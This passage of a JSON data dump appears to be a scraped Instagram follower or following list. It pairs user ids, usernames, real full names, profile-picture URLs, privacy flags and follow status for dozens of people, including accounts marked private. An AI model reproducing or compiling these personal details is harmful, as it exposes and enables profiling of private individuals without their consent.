"https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119779202_459237245034554_8008796585596779912_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=FvXGXxRvJcwAX-inuAn&edm=AOG-cTkBAAAA&ccb=7-4&oh=c6206a23dc65d4987ecec6470e1b7a05&oe=6105A5AF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "4210555122", "username": "carolss550", "full_name": "Carolina", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/184979835_1418907065155745_5506669764982382417_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=KwdR8mHVmaYAX9iwkEZ&edm=AOG-cTkBAAAA&ccb=7-4&oh=a62993507166db1c8947f81c7ab3e523&oe=6104DE92&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "10138647431", "username": "david.stake", "full_name": "david stake", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/50052811_318155708805823_2557019104774979584_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=7PGv703-XD8AX9pyzmC&edm=AOG-cTkBAAAA&ccb=7-4&oh=f0d024bba9c29113f3b060bf91b0897d&oe=61059E92&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "38953137671", "username": "novaeracertificadora", "full_name": "Nova Era Certificadora", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119586412_128516565309987_5574948249011283734_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=cvEiAqzkbNAAX81fY2g&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=6cded0ae50b598707b3918dac45adad3&oe=610462FE&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41884825806", "username": "jppepeu_", "full_name": "Jo\u00e3o Pedro da Silva Rangel", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119566543_657050741592484_2214571614876001811_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=134NM3anmMgAX_96AQQ&edm=AOG-cTkBAAAA&ccb=7-4&oh=bc1a6f820f61d2ccea92ee00d190737a&oe=6105BA2B&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "188286983", "username": "rrenck", "full_name": "Raphael Renck Ferreira", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/174316583_121582553365050_7067100442387517265_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=i-DL5GagIIAAX-GU8pY&edm=AOG-cTkBAAAA&ccb=7-4&oh=543b0c4a12f88a61a86d2d69d5853dd0&oe=6103F013&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "5128732823", "username": "jormoura2", "full_name": "Jorge Moura", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/17817647_451107681905440_1552556005202591744_a.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=-_u1SxAd3T8AX9LXy6f&edm=AOG-cTkBAAAA&ccb=7-4&oh=8fa954a91b8fdb0c42450ad71513fec4&oe=61051043&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "7709735880", "username": "lucasmateusborgesdossantos", "full_name": "Lucas Mateus Borges Dos Santos", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/104395371_735348423879661_2293686772609421723_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=5pFBhYTUGlQAX8H3gIP&edm=AOG-cTkBAAAA&ccb=7-4&oh=cd5123e3d581a02362b81b1a7de5094d&oe=6104BC7F&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "367632834", "username": "pedro__hiago__", "full_name": "PEDRO HIAGO", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/188423371_316113740172571_1884264235126612443_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=p9F63O2x-McAX87OmNL&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=794f669e1249f9085bb318bbcf8ba1ed&oe=61058AAA&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "27513692314", "username": "eder.costa.1232", "full_name": "Eder Costa", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/199672002_2884205555171712_7011559889514235715_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=G2cSc5R2jG4AX-1BAPq&edm=AOG-cTkBAAAA&ccb=7-4&oh=c3ecb0f81aae8ae273a1f4466d82bda0&oe=61052AEC&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "471140601", "username": "rogeriomauriciocorretor", "full_name": "Roge\u0301rio M Corretor de Im\u00f3veis", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/193037339_157737309701761_1177880322589486467_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=pibTWA9py5EAX8wkU20&edm=AOG-cTkBAAAA&ccb=7-4&oh=0da899d6c99fcdb980acca803ee9998d&oe=61049E75&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "8163113233", "username": "edi.adriano.9", "full_name": "Edi Adriano", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/53288118_664940733934861_1825528608819511296_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=doaB2jWD8XYAX8je3CW&edm=AOG-cTkBAAAA&ccb=7-4&oh=00c6c2c13ed4ff3457e9811171441f5b&oe=61040EAA&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "1350478743", "username": "nnascimen7o", "full_name": "Natanael Nascimento", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/189279458_563490918389151_5205676857185611522_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=JaulHHVyTb0AX_4nuPM&edm=AOG-cTkBAAAA&ccb=7-4&oh=2acef985dad5073f4243abd86ff79db9&oe=61041531&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "32957145454", "username": "felippee_l", "full_name": "Felipe", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/219004466_129459249256317_9017773790178589795_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=QUprepXhRrkAX8vgxZH&edm=AOG-cTkBAAAA&ccb=7-4&oh=52312c5a6e37de62c36bfa7a3fc4fb85&oe=6105B03E&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "337053347", "username": "mikeheredia.do", "full_name": "Migue", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/40756308_296996384223519_54264141531054080_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=XBcBya4Is5IAX8YUFMs&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=8cbd7bff3518901bf732fd3fbb9d55c0&oe=610550C9&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "3533434322", "username": "lucasmikuska_", "full_name": "Mikuska", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/197920723_981900022577202_637414156538671394_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=yDI33zwiwnoAX8dWSEJ&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=731216622f953507dc4782152c4a85a4&oe=6104CF5D&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "19270569809", "username": "gc886185", "full_name": "J\u00e9ssica Silva", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/150948064_3522571764539273_2026317694533686305_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=VuFimFNFWjYAX9lFvTi&edm=AOG-cTkBAAAA&ccb=7-4&oh=ff6bb11b6d51b7e9e929678ee8f05664&oe=61040C47&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "5752609655", "username": "michael_santos.f", "full_name": "Michael Santos", "profile_pic_url": "https://instagram.fmcz4-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fmcz4-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX8PFjWo&edm=AL4D0a4BAAAA&ccb=7-4&oh=f088364ce91b923b0f773fef80f39832&oe=6104094F&_nc_sid=712cc3&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "45740320320", "username": "tashdit_saif_0", "full_name": "S A I F", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/146690169_229008725616514_5674147768767137288_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=QgNBNmx8OhsAX8VFnvh&edm=AOG-cTkBAAAA&ccb=7-4&oh=ef218ae8558813de3be08ed0aac099f5&oe=61046ECE&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "27398268518", "username": "braian_silva11", "full_name": "braian_silva", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/147480439_422827065802730_8389273911572786963_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=7Kzl7naHGf4AX8OTRUA&edm=AOG-cTkBAAAA&ccb=7-4&oh=c6384f78d0f9a7af66ec5ee91ce72f45&oe=61051D1E&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "44784613543", "username": "m12_fluid", "full_name": "Fluid", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/135054680_393927711678323_3855465949309370162_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=HIsxDXVpj_kAX8ovNAk&edm=AOG-cTkBAAAA&ccb=7-4&oh=cccbefc7917426ab6707df7f42d6584a&oe=6105952A&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "8187819268", "username": "lil_annder777_", "full_name": "Anderson MORK", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/146534181_878293316238439_5899302545528187161_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=kX93N5LxmsQAX_76vqs&edm=AOG-cTkBAAAA&ccb=7-4&oh=98961412515792d8d7f41f463f14e341&oe=61049AA3&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "8746112905", "username": "jose.carlosofc", "full_name": "Jos\u00e9 Carlos Gomes", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/201982105_366107441796226_4999970353358600431_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=cBLSfYrGgdwAX9G4p1J&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=20e75b66c8559fee903cf8f5c2f021e6&oe=61049D3B&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "39939135898", "username": "spockespike", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/161786420_1165956017189197_6749241596642692003_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=APDZ7sYl3YkAX-TjLDD&edm=AOG-cTkBAAAA&ccb=7-4&oh=60be1ab5b70efa9e6f64b0ac42b5d3bd&oe=6103FD19&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "1082432566", "username": "pesado1_", "full_name": "Thiago Maia", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/101469669_1183981618602591_5828368034825240576_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=80IjlGx3XukAX9NjNMB&edm=AOG-cTkBAAAA&ccb=7-4&oh=c07d23d25d0053e79fac4f42ebdc3e08&oe=6104F6CA&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "21505460848", "username": "mathiasdarlana", "full_name": "Darlana Mathias", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/202450204_203467205008457_4217697466067223603_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=poInlOVbrO0AX-t5a-f&edm=AOG-cTkBAAAA&ccb=7-4&oh=2872d1791864a79c3a8815cfb1862682&oe=61047A77&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "43121973798", "username": "miniigamers", "full_name": "Minii Gamers", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/122070818_750267115579660_331274012563176333_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=djFxr61R_-YAX_jt-zv&edm=AOG-cTkBAAAA&ccb=7-4&oh=3db49fedaae4281d947f85f407c4d320&oe=61044944&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "42917932299", "username": "impresa_f5", "full_name": "F5", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/204128002_187647873366513_2451363606298519804_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=gRJFtdzi6D8AX9mb9du&edm=AOG-cTkBAAAA&ccb=7-4&oh=ceca4a4a54e34fb23ce0aabcb565b7e1&oe=6104F0D3&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "37364744150", "username": "swegger22", "full_name": "Cj", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/103315406_1182843942053276_6405405554750923615_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=W3VzCovqjTAAX_RDmey&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=42c9baf8852e86962e031c3cb6812fa7&oe=61046522&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "35774790872", "username": "fabiozf_oficial", "full_name": "FabioZF", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/174834579_124333466405188_3945116176287661309_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=zI5oN_IAvVAAX_qb97K&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=9d08af274862900f7c7185773fa5d958&oe=61040848&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "40012239740", "username": "shit_do_2077", "full_name": "2077", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/160098565_5420328581340959_6739215836530083107_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=RE3GxZU_ERgAX-cvLUy&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=e252796f6e11557b0fbfb7dafd29d70d&oe=6105955A&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "40502750103", "username": "hellenn.silvah", "full_name": "hellen", "profile_pic_url": "https://instagram.fmcz4-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fmcz4-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX8PFjWo&edm=AL4D0a4BAAAA&ccb=7-4&oh=f088364ce91b923b0f773fef80f39832&oe=6104094F&_nc_sid=712cc3&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "8621982492", "username": "julius_rock_terry_crews", "full_name": "Julios Rock", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/70783455_455179981746254_1197660555431641088_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=MOm4jPVZv-4AX_1uKVQ&edm=AOG-cTkBAAAA&ccb=7-4&oh=050e3edb2c0eddf7c5a2c73fbf009ff2&oe=61051650&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "26484632875", "username": "chrishendges", "full_name": "Christopher Hendges", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/120316320_3557808934286434_365230446417734137_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=bfQLysnVulkAX86phII&edm=AOG-cTkBAAAA&ccb=7-4&oh=46854be0a4ac3233bf26d17f846d36ba&oe=610470B3&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "56031555", "username": "lokollt", "full_name": "Iber\u00ea Amaral", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/202623226_123196476611308_2663957783180164908_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=24tE5NWDR5EAX8eKTIX&edm=AOG-cTkBAAAA&ccb=7-4&oh=94d0c727c6aceec4aad299300c1c451a&oe=61058639&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "6556624000", "username": "djombocarioazere", "full_name": "Djombo Cario Azere Azere", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/75551288_2556399471107954_301284207693398016_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=x76wau0-LOYAX-5xH6B&edm=AOG-cTkBAAAA&ccb=7-4&oh=ba32dee22d5a7fe0f8336e692eaa1509&oe=61047C2D&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "8944005267", "username": "thomassilva251", "full_name": "Thomas Silva", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119475982_1241596239549608_2137328386228085870_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=BVX3AHzAWEMAX82o_0L&edm=AOG-cTkBAAAA&ccb=7-4&oh=aeda27dff46ecdc4efa53b6732575b42&oe=61054328&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "12301522336", "username": "wallacy_096_", "full_name": "Walace Santos", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/54446694_409259213194595_3672334189270663168_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=e7XdrheRj3UAX89kcD0&edm=AOG-cTkBAAAA&ccb=7-4&oh=5488f1257659e2cf0b21ff63d452b25e&oe=61050B90&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41229750330", "username": "carol285424", "full_name": "ana carolina", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/121367785_3281593918626854_4466065248111389434_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=DywuQmTKoDAAX-2QiK3&edm=AOG-cTkBAAAA&ccb=7-4&oh=f95274f6b347382b4a0d5a5f433f6e66&oe=6104C321&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41238732879", "username": "corna_asmansas", "full_name": "@cornasmansas", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119201424_324454465476280_5918142324695944249_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=guyAlsiEJboAX80VmYO&edm=AOG-cTkBAAAA&ccb=7-4&oh=35b6f3211a7e5209f73d3456cebbe3f4&oe=6104F89C&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41853994993", "username": "prantinha0_0", "full_name": "p\u00e3o de batata", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119230434_351566539556669_4771432974087700888_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=kK7XGtMGC4gAX_Tpk7S&edm=AOG-cTkBAAAA&ccb=7-4&oh=6ad699ffcb432ebf6c47c14f424d1866&oe=610522D4&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41696202656", "username": "se.eu.te.seguir_siga.minha.bio", "full_name": "Siga minha bio", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119519864_202448757926581_9042388213209496476_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=OCiE0ngyYvwAX8o3KsB&edm=AOG-cTkBAAAA&ccb=7-4&oh=75acc5b64cfc242b12c4e75524e183fb&oe=61056628&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "3736221213", "username": "joao_viictor_lemos", "full_name": "Jo\u00e3o Victor Lemos Rodrigues", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119916789_130187495472292_6914120052426317897_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Nbekrhns-YgAX-coHb8&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=956dfe650c2ced2d4cdc6f47534bbf1d&oe=61043511&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41664062472", "username": "rose531714", "full_name": "Rosemeri Rosa Do Prado", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/182833447_1954040021424974_6412692541712488559_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=tXcNmOKz1eIAX-kfLPi&edm=AOG-cTkBAAAA&ccb=7-4&oh=478df60e53adc27bb88d6bd9333a8fa5&oe=61040D26&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "4073865742", "username": "dudajurubeba", "full_name": "duda", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/194306648_4675447385805369_5354315362159119209_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=0twrzSmcgYcAX-b9u9G&edm=AOG-cTkBAAAA&ccb=7-4&oh=a965116cbf32a2a8692eedb9d96643e8&oe=61041ABF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41889249508", "username": "nimesluiza", "full_name": "Luiza", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119596273_1258203831210781_480224605827477983_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=jJoboHmfIt0AX-gQ0Xf&edm=AOG-cTkBAAAA&ccb=7-4&oh=55f737e8de2ca20ba7a09d7c6c6b14e3&oe=61041F35&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "12380892300", "username": "c0d1_second", "full_name": "Adrian Fernando", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/214352174_540473844032184_8367294973069945579_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=cnvlOletpXAAX9v7P2s&edm=AOG-cTkBAAAA&ccb=7-4&oh=f7165383a3046f7d473d4f5dc1f85832&oe=61053306&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "13316074217", "username": "startz.designer", "full_name": "Startz Designer (Em casa \ud83c\udfe1)", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/117166236_152780126431959_6911689506806071196_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=VN32PHb9VFAAX-e1C98&edm=AOG-cTkBAAAA&ccb=7-4&oh=bfe89714e43da964d7faee0b8120f803&oe=6103E47E&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "26671521851", "username": "rochasouzam", "full_name": "Marcelo Rocha", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/223595174_1559196687745598_2884297138504359809_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=h8dhnseyKB8AX-Dt-g8&edm=AOG-cTkBAAAA&ccb=7-4&oh=5b822dc74c80362cd1109e8d6864c311&oe=61041458&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41682858253", "username": "assisgames83", "full_name": "Assis", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119604814_329724825023219_348397907191435206_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=PtRFF5thKv4AX_Rj8JQ&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=aa6ad58891be2b386404e0c9ba2aa8b9&oe=61052464&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "34808767050", "username": "iron3dx_games", "full_name": "Iron Games", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/95566428_710984453043970_1195575713881653248_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=I8sIIb8LDrwAX_rjlyX&edm=AOG-cTkBAAAA&ccb=7-4&oh=34dac09f68ad67bf0b90d84561a10c10&oe=61054134&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "9922829110", "username": "ruan_carlosb", "full_name": "Ruan Carlos", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/126876467_390534655429383_296274326167422099_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=IkYyMZbygMYAX-cJrzb&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=f50cb23b25a6e0bc84d38583a75f33f6&oe=6105037D&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "16863025776", "username": "gabrielsantannamartins", "full_name": "GabrielSMartins", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/67551495_335049450778334_762175769542656000_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=5adE6EvgulIAX_eqqJ6&edm=AOG-cTkBAAAA&ccb=7-4&oh=a0a73f63eff19af4df1c2ea6d33e3943&oe=61044452&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "17376484926", "username": "luys_guilherme23", "full_name": "luys_guilherme23", "profile_pic_url": 